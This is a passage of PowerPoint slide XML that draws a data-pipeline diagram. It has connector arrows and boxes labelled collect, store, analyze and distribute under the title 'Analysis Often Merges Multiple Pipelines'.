              <a:off x="2255114" y="2697956"/>
              <a:ext cx="720585" cy="858838"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23" name="Straight Arrow Connector 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3258342-4081-F242-B7F9-50F98FDA06B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2320644" y="3533776"/>
              <a:ext cx="589525" cy="269875"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Arrow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8DF870C-2233-8140-B913-611CC34EF8C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2330485" y="4040188"/>
              <a:ext cx="569842" cy="425450"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Straight Arrow Connector 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B135FE52-4BBB-EB49-8922-1FA56E0A2DCA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2331721" y="4323349"/>
              <a:ext cx="567370" cy="1188451"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29" name="Straight Arrow Connector 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63869E19-1969-634B-BF35-57F4D3DA17C9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="15367" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="2697163"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Arrow Connector 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA5BAA08-5E18-9842-BE7F-CBFCCC450188}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="3558226"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="34" name="Straight Arrow Connector 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23796674-828E-0748-9478-1D1F9D2E0BBD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="4498397"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="35" name="Straight Arrow Connector 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FAB7523-35E8-0245-8CC5-F6C4634A0AD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="5430259"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1746809C-20CE-B24D-A077-8D32721E4057}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="6472238"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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis Often Merges Multiple Pipelines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17410" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4C3E5D-E7BF-6445-A79E-90499292F72D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="574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14000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Usually you will take advantage of other datasets you stored.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17411" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16EF99DF-8B65-E94E-A84F-9925BC0163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7913" y="4049713"/>
            <a:ext cx="942975" cy="9429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12" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94FD1724-4B12-3C4C-B1E9-6BEF030D224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1888" y="2511425"/>
            <a:ext cx="836612" cy="8366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413" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD892580-0F3E-7B4C-8728-AB7A659422D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="7290594" y="3509169"/>
            <a:ext cx="1416050" cy="455612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77933C"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>distribute</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17414" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64FA40F6-23B9-0947-87FF-EB80FFB22F01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5761038" y="3506788"/>
            <a:ext cx="1416050" cy="455612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4F81BD"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>analyze</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17415" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8465CABB-1D9F-4F4A-BEAE-5389A0F2E250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2224882" y="2712243"/>
            <a:ext cx="1416050" cy="455613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77933C"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>collect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17417" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE39323D-0469-AD40-9060-A022638EA502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="2204244" y="4312444"/>
            <a:ext cx="1416050" cy="455612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77933C"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>collect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17427" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B668B7D-DF65-5C40-9077-649D89B3DFE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="4274344" y="2721769"/>
            <a:ext cx="1416050" cy="455612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77933C"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17428" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F26C597-9CDB-C348-9ED4-90EBDDE56DD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="4274344" y="4320382"/>
            <a:ext cx="1416050" cy="455612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77933C"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF535A3A-0FEC-2543-B73B-9312405F3106}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17412" idx="3"/>
            <a:endCxn id="17415" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1968500" y="2929732"/>
            <a:ext cx="736601" cy="10318"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31260B9E-A2B1-7B43-82FA-6E39069F942A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="17427" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3160713" y="2949575"/>
            <a:ext cx="1593850" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Straight Arrow Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B4224A-1D38-7A48-842F-F3473851A08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1929769" y="4447383"/>
            <a:ext cx="736601" cy="10318"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C982389C-B42D-EF44-BBD7-3051EE2FAE68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3172652" y="4472418"/>
            <a:ext cx="1593850" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E36FC65-8383-9C4D-B0FE-BBF8D6825496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="4294982" y="4312444"/>
            <a:ext cx="1416050" cy="455612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77933C"/>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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>store</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Arrow Connector 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5071784C-16DF-C049-97C9-FFF0F26AF864}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="17413" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7201694" y="3734594"/>
            <a:ext cx="569119" cy="2381"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle"/>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4"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent4"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent4"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C2CFD6E-F8F1-FE46-81D2-B99C3F76FCB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="17427" idx="2"/>
            <a:endCxn id="17414" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
